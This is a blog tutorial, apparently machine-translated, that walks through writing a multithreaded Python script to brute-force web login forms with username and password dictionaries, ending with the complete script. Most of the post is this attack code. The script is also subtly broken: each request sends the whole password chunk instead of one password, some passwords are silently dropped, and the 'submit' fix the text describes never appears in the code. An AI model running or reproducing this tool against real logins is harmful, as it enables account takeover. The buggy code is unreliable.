current position:Home>The third stop of Python Programming - online password cracking tool

The third stop of Python Programming - online password cracking tool

2022-05-15 06:04:15Wandering mage 12

Catalog

Preface

One 、 Introduction to online password cracking

1. What is online password cracking

2.web Tools used to crack in security burpsuite

3. Import what you need python modular

Two 、 Introduction to command line module

1.optparse Module introduction

2.web Password cracking command line reading template writing

3、 ... and 、payload determine

1. Ideas

2. The password dictionary list determines

Four 、 Multithreaded access

1、python Multithreading in

2、 Use multithreaded lists in tools

5、 ... and 、 Function module writing

1. Ideas

2.python Third party Library requests

6、 ... and 、 A functional test Bug modify

1、 Problem finding

2、Bug modify

The complete code is as follows :


Preface

Beginners write tools !

Learning only , Not for any other purpose !

Effect display :

 

One 、 Introduction to online password cracking

1. What is online password cracking

1) Enumerate legal users for the authentication credentials of online services

2) Offline cracking ( Get the ciphertext and decrypt it ( Such as :md5))

2.web Tools used to crack in security burpsuite

1) Crack based on form verification

2) be based on HTTP Authentication cracking

3. Import what you need python modular

import optparse,threading,math,requests

Two 、 Introduction to command line module

1.optparse Module introduction

        1) Import optparse

        2) initialization optparse.OptionParse

        3) Sets the default value of the initial object usage attribute

        4) Add parameter :parse.add_option('-u','--user_file',dest='username_file',help='read username from file',metavar='FILE',action='store',type='string')

        5) Store the submitted command line parameters :(options,args)=parse.parse_args()

        6) Test output :print(options.username_file)

parser = optparse.OptionParser()
parser.usage = ' Online password cracking .py -s url -u user_file -p pass_file -t num'
parser.add_option("-s","--site",help="website to test",action="store",type="string",metavar="url",dest="site")
parser.add_option("-u","--userfile",help="read username from file",action="store",type="string",metavar="FILE",dest="userfile")
parser.add_option("-p","--passfile",help="read pass from file",action="store",type="string",metavar="FILE",dest="passfile")
parser.add_option("-t","--threads",help="number of threads",action="store",type="string",metavar="THREADS",dest="threads")
(options,args) = parser.parse_args()
# print(options.site)
# print(options.usernamefile)
# print(options.passfile)
# print(options.threadsfile)

# payload determine 
ths = options.threads
# print(ths)
# print(type(ths))
pass_dic = options.passfile
# print(pass_dic)
user_dic = options.userfile
# print(user_dic)
site = options.site
# print(site)

2.web Password cracking command line reading template writing

        1) Need to read the user name

        2) Need to read user password

        3) Need to read url

        4) Number of threads to read

3、 ... and 、payload determine

1. Ideas

         The user name is read circularly , Passwords are divided equally according to the number of threads , User name and password combination , Use multithreaded scanning to detect ;

#  Create a new password dictionary list   [[],[],[],[]]
pass_list = []
result_num = 0
temp_thread_list = []
#  According to the number of threads , Determine the number of lines of content in each item 
# 1) Read the contents of all password dictionaries into the list to be given , Determine the number of lines in the dictionary 
with open(pass_dic,'r') as f:
    temp_list = f.readlines()
    num = len(temp_list)
# print(temp_list)
# print(num)        # 20

2. The password dictionary list determines

         Determine according to the number of threads ;

#  Use the number of items in the resulting temporary list   Divide   Number of threads    To determine the number of items in each thread ( Rounding up )
    result = math.ceil(int(num)/int(ths))
    # print(result)   # 2
    result_num=result

    flag = 0
    for line in temp_list:
        flag += 1
        temp_thread_list.append(line.strip())
        if flag == result:
            flag = 0
            pass_list.append(temp_thread_list)
            temp_thread_list = []

# print(pass_list)
# print(type(pass_list))

Four 、 Multithreaded access

1、python Multithreading in

        import threading

        threading.Thread(target=( Function name ),args= Parameters )

         Open thread start()

2、 Use multithreaded lists in tools

# payload  ->  pass_list  combination    Determine the user name 
#  Use thread list 
ths_list = []
with open(user_dic,'r') as f:
    user_list = f.readlines()
    for user in user_list:
        for pass_line in pass_list:
            payload = {'user':user.strip(),'pass':pass_line}
            # print(payload)
            ths_list.append(threading.Thread(target=scan,args=(payload,)))
for th in ths_list:
    th.start()

5、 ... and 、 Function module writing

1. Ideas

         Depending on what is returned

         According to the returned length

2.python Third party Library requests

        import requests

        r = requests.post(url,data)

        len(r.text)

def scan(payload):
    # print(payload)
    user = payload['user']
    pass_list = payload['pass']
    useragent = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'}
    for password in pass_list:
        r = requests.post(url=site,data={'username':user,'password':pass_list},headers=useragent)
        print('URL:'+site+':  ''username:'+user+'  '+'password:'+password+'  '+'lenght:'+str(len(r.text))+'  '+str(r.status_code))
        # print(r.request.headers)

6、 ... and 、 A functional test Bug modify

1、 Problem finding

         Many times, you don't try to log in directly , The return length is the same whether it is correct or not , You can view the source code or review elements , In the submitted parameters, except admin and password, also submit.

2、Bug modify

         So in date After that, we will submit add

The complete code is as follows :

# coding=utf8
# @time:2022/5/9 15:04
# Author  Haoyu 

#  Full code display 
import optparse,threading,math,requests

parser = optparse.OptionParser()
parser.usage = ' Online password cracking .py -s url -u user_file -p pass_file -t num'
parser.add_option("-s","--site",help="website to test",action="store",type="string",metavar="url",dest="site")
parser.add_option("-u","--userfile",help="read username from file",action="store",type="string",metavar="FILE",dest="userfile")
parser.add_option("-p","--passfile",help="read pass from file",action="store",type="string",metavar="FILE",dest="passfile")
parser.add_option("-t","--threads",help="number of threads",action="store",type="string",metavar="THREADS",dest="threads")
(options,args) = parser.parse_args()
# print(options.site)
# print(options.usernamefile)
# print(options.passfile)
# print(options.threadsfile)

# payload determine 
ths = options.threads
# print(ths)
# print(type(ths))
pass_dic = options.passfile
# print(pass_dic)
user_dic = options.userfile
# print(user_dic)
site = options.site
# print(site)


#  Create a new password dictionary list   [[],[],[],[]]
pass_list = []
result_num = 0
temp_thread_list = []
#  According to the number of threads , Determine the number of lines of content in each item 
# 1) Read the contents of all password dictionaries into the list to be given , Determine the number of lines in the dictionary 
with open(pass_dic,'r') as f:
    temp_list = f.readlines()
    num = len(temp_list)
# print(temp_list)
# print(num)        # 20


# 2) Use the number of items in the resulting temporary list   Divide   Number of threads    To determine the number of items in each thread ( Rounding up )
    result = math.ceil(int(num)/int(ths))
    # print(result)   # 2
    result_num=result

    flag = 0
    for line in temp_list:
        flag += 1
        temp_thread_list.append(line.strip())
        if flag == result:
            flag = 0
            pass_list.append(temp_thread_list)
            temp_thread_list = []

# print(pass_list)
# print(type(pass_list))

def scan(payload):
    # print(payload)
    user = payload['user']
    pass_list = payload['pass']
    useragent = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'}
    for password in pass_list:
        r = requests.post(url=site,data={'username':user,'password':pass_list},headers=useragent)
        print('URL:'+site+':  ''username:'+user+'  '+'password:'+password+'  '+'lenght:'+str(len(r.text))+'  '+str(r.status_code))
        # print(r.request.headers)



# 3)payload  ->  pass_list  combination    Determine the user name 
#  Use thread list 
ths_list = []
with open(user_dic,'r') as f:
    user_list = f.readlines()
    for user in user_list:
        for pass_line in pass_list:
            payload = {'user':user.strip(),'pass':pass_line}
            # print(payload)
            ths_list.append(threading.Thread(target=scan,args=(payload,)))
for th in ths_list:
    th.start()

More secure sharing , Please pay attention to 【 Security info】 WeChat official account !

copyright notice
author[Wandering mage 12],Please bring the original link to reprint, thank you.
https://en.pythonmana.com/2022/131/202205110607423847.html

Random recommended